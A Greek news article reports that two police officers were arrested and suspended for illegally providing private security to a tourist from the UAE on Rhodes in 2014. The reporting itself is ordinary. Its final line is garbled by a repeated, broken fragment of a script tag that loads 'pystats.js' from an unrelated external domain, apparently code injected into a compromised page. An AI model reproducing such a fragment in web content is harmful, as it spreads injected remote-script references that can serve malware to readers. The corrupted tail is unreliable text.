Αστυνομικοί συνελήφθησαν γιατί έκαναν τους μπράβους Αραβα τουρίστα στη Ρόδο

Αστυνομικοί έκαναν τους μπράβους Αραβα τουρίστα στη Ρόδο -Συνελήφθησαν και τέθηκαν σε διαθεσιμότητα

Σε διαθεσιμότητα τέθηκαν δύο αστυνομικοί οι οποίοι συνελήφθησαν να παρέχουν υπηρεσίες σεκιούριτι σε Αραβα τουρίστα στη Ρόδο.

Σύμφωνα με την ΕΛ.ΑΣ., πρόκειται για έναν Ανθυπαστυνόμο 35 ετών, ο οποίος υπηρετεί σε υπηρεσία του νοτίου Αιγαίου και έναν Αρχιφύλακα 37 ετών, ο οποίος υπηρετεί σε υπηρεσία της Αττικής.

Οπως προέκυψε από την έρευνα που διενήργησε η Διεύθυνση Εσωτερικών Υποθέσεων, από τις αρχές Ιουνίου έως και τέλος Αυγούστου του 2014, οι δυο αστυνομικοί παρείχαν παράνομα υπηρεσίες ασφαλείας σε τουρίστα από τα Αραβικά Εμιράτα. Μάλιστα, όπως φαίνεται ήταν παλιοί γνώριμοι με τον Αραβα, καθώς του παρείχαν ανάλογες υπηρεσίες και το Σεπτέμβριο του 2013.

Οι δυο αστυνομικοί συνελήφθησαν με την αυτόφωρο διαδικασία την Τετάρτη και την Πέμπτη οδηγήθηκαν ενώπιον του εισαγγελέα. Σε βάρος τους σχηματίστηκε ποινική δικογραφία για παράβαση καθήκοντος και παραβίαση των διατάξεων σχετικά με τις ιδιωτικές επιχειρήσεις παροχής υπηρεσιών ασφαλείας.

Παράλληλα, με απόφαση του Αρχηγείου της Ελληνικής Αστυνομίας τέθηκαν σε διαθεσιμότητα και παράλληλα διατάχθηκε σε βάρος τους η διενέργεια Ένορκης Διοικητικής Εξέτασης. challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >